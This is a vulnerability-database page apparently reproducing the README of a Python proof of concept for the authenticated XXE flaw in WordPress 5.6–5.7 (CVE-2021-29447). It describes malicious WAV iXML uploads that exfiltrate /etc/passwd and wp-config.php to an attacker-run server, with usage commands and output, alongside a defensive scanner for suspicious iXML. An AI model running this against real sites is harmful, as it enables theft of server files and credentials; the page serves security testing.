POC details: ac44a63d4b1ec8f0e0b860900b8ba53939d501a4

Source
Related vulnerability
Title: WordPress code issue vulnerability (CVE-2021-29447)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It supports hosting personal blog sites on servers running PHP and MySQL. WordPress contains a code issue vulnerability; an attacker who completes a successful XXE attack can use it to access internal files.
Description
POC to exploit WordPress 5.6-5.7 (PHP 8+) Authenticated XXE Injection.
Introduction
# CVE-2021-29447 Authenticated XXE Exploit for WordPress 🎯

A Python PoC to exploit the authenticated XXE vulnerability (CVE-2021-29447) in WordPress versions 5.6–5.7 via **WAV metadata**. It abuses the iXML chunk in WAV files to trigger an **Out-of-Band (OOB) exfiltration** of sensitive data—like `/etc/passwd`, `wp-config.php`, and more—straight into your `dump/` directory.

---

## How It Works 🔍

This script leverages an **XML External Entity (XXE)** flaw in how WordPress parses WAV metadata:

1. **WAV Creation**: Generates a malicious WAV file embedding an iXML chunk that references a remote DTD on your machine.
2. **DTD Hosting**: Spins up an HTTP server (or uses your own) to serve the crafted DTD, which instructs WordPress to read & Base64-encode a target file (e.g., `/etc/passwd`).
3. **File Upload**: Authenticates to WordPress, retrieves the media-upload nonce, and uploads the WAV via the Media Library.
4. **OOB Exfiltration**: WordPress parses the WAV, fetches the DTD, then performs a callback to your server containing the Base64 data. The script decodes it and writes it to `dump/`.
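As an added defender-side example (not part of this PoC, nor of WordPress itself), the following Python scanner walks the RIFF chunks of an uploaded WAV and flags any iXML chunk that carries a DOCTYPE or entity declaration, which legitimate iXML metadata never needs; both sample WAVs and the `example.invalid` DTD URL are constructed inline for the demonstration.

```python
import re
import struct

# Constructs that have no place in benign iXML metadata but are required for XXE.
SUSPICIOUS = re.compile(rb"<!DOCTYPE|<!ENTITY|SYSTEM\s+[\"']|PUBLIC\s+[\"']", re.IGNORECASE)

def build_wav(chunks):
    """Assemble a minimal RIFF/WAVE container from (id, payload) pairs (constructed test data)."""
    body = b"WAVE"
    for cid, payload in chunks:
        body += cid + struct.pack("<I", len(payload)) + payload
        if len(payload) % 2:
            body += b"\x00"  # RIFF chunk payloads are padded to an even length
    return b"RIFF" + struct.pack("<I", len(body)) + body

def iter_chunks(data):
    """Yield (chunk_id, payload) for every top-level chunk of a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        yield cid, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # skip the pad byte for odd-sized chunks

def scan_wav(data):
    """Return the suspicious tokens found in iXML chunks; an empty list means clean."""
    findings = []
    for cid, payload in iter_chunks(data):
        if cid != b"iXML":
            continue
        findings.extend(m.group(0).decode("ascii", "replace") for m in SUSPICIOUS.finditer(payload))
    return findings

# Constructed samples: a 16-byte PCM fmt chunk, plain iXML metadata, and an iXML
# chunk whose DOCTYPE points at an external DTD (a marker only, not a working payload).
FMT = b"\x01\x00\x01\x00\x44\xac\x00\x00\x88\x58\x01\x00\x02\x00\x10\x00"
BENIGN_IXML = b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>'
SUSPECT_IXML = b'<?xml version="1.0"?><!DOCTYPE BWFXML SYSTEM "http://example.invalid/x.dtd"><BWFXML/>'
BENIGN_WAV = build_wav([(b"fmt ", FMT), (b"iXML", BENIGN_IXML), (b"data", b"\x00\x00")])
SUSPECT_WAV = build_wav([(b"fmt ", FMT), (b"iXML", SUSPECT_IXML), (b"data", b"\x00\x00")])

if __name__ == "__main__":
    for name, wav in (("benign", BENIGN_WAV), ("suspect", SUSPECT_WAV)):
        print(name, scan_wav(wav) or "clean")
```

Rejecting or quarantining uploads for which `scan_wav` returns findings blocks this file-based vector before the metadata parser ever runs.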

---

## Key Features ⚡

- **Interactive Mode** (`-i`): Prompt for file paths until `CTRL+C`—great for ad-hoc exploration.
- **Wordlist Mode** (`-w <file>`): Batch process dozens of file paths from a list.
- **Skip HTTP Server** (`--no-http`): Use your own webserver instead of the built-in one.
- **Debug Mode** (`--debug`): See detailed HTTP & internal debug logs.
- **Clean, Colored Logs**: Prefixed labels—`[CONFIG]`, `[UPLOAD]`, `[DUMP]`, `[WARN]`, `[ERROR]`—for quick status checks.
- **Configurable Timeout**: Wait up to **6 seconds** for each exfil before continuing.

---

## Installation 🛠️

1. **Clone** the repository:
   ```bash
   git clone https://github.com/Tea-On/CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7.git
   cd CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7
   ```
2. **Install** the Python dependency:
   ```bash
   pip3 install requests
   ```

---

## 🧾 Argument Reference

| Argument            | Required | Description                                                    |
|---------------------|----------|----------------------------------------------------------------|
| `-H, --host`        | ✅       | Local host/IP for serving DTD and receiving callbacks          |
| `-p, --port`        | ✅       | Local port for HTTP server                                     |
| `-u, --user`        | ✅       | WordPress username with upload permissions                     |
| `-P, --pass`        | ✅       | WordPress password                                             |
| `-d, --domain`      | ✅       | Target WordPress URL (include `http://`)                       |
| `-w, --wordlist`    | ❌       | File containing newline-separated paths to fetch               |
| `-i, --interactive` | ❌       | Prompt for file paths interactively                            |
| `--no-http`         | ❌       | Skip starting the built-in HTTP server                         |
| `--debug`           | ❌       | Enable debug logs (verbose HTTP & internal details)            |


---

## Example Usage 💥

#### Interactive Mode
```bash
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -i
```
```
[CONFIG] Interactive mode (CTRL+C to exit)
File> /etc/passwd
[CONFIG] DTD written: dtd/L2V0Yy9wYXNzd2Q=.dtd
[CONFIG] WAV built
[INFO] Nonce: d87f00a552
[DUMP] Dumped: dump/passwd
[UPLOAD] Upload ok (200)
[UPLOAD] URL: http://vulnerable.local/wp-content/uploads/payload.wav
File>
```

#### Wordlist Mode
```bash
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -w wordlist.txt
```
```
[CONFIG] Loaded 4 paths from "wordlist.txt"
[CONFIG] Using HTTP server at 10.10.14.8:8080
[CONFIG] Starting batch exfiltration...
[DUMP] [/etc/passwd] → dump/passwd
[WARN] No exfil for /etc/hostname within 6s, continuing
[UPLOAD] Upload ok (200)
[ERROR] Upload fail (502) on "/nonexistent"
```

#### No-Server & Debug
```bash
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local --no-http --debug -w wordlist.txt
```
> Use your own HTTP server to host `dtd/` and capture callbacks. Debug logs appear as `[DEBUG]`.

---

## Output Directories 📂

- `dtd/` – Generated DTD files served to the target.
- `dump/` – Decoded file contents, named after the original path.

---

## Tips & Tricks 💡

- **Adjust Timeout**: Change `EXFIL_TIMEOUT` variable (default 6s) for slow networks.
- **Use Debug**: Enable `--debug` to diagnose issues with auth, upload, or callbacks.

---

## Responsible Disclosure & License 🔐

**Only use this tool on systems you own or have explicit permission to test.**

Licensed under the [MIT License](LICENSE). Contributions welcome—let’s keep hacking **ethical** and **fun**! ✨
File snapshot

```
[4.0K] /data/pocs/ac44a63d4b1ec8f0e0b860900b8ba53939d501a4
├── [ 10K] exploit_CVE-2021-29447.py
├── [1.0K] LICENSE
└── [4.9K] README.md

0 directories, 3 files
```
Notes
    1. It is recommended to access the POC through the source first.
    2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.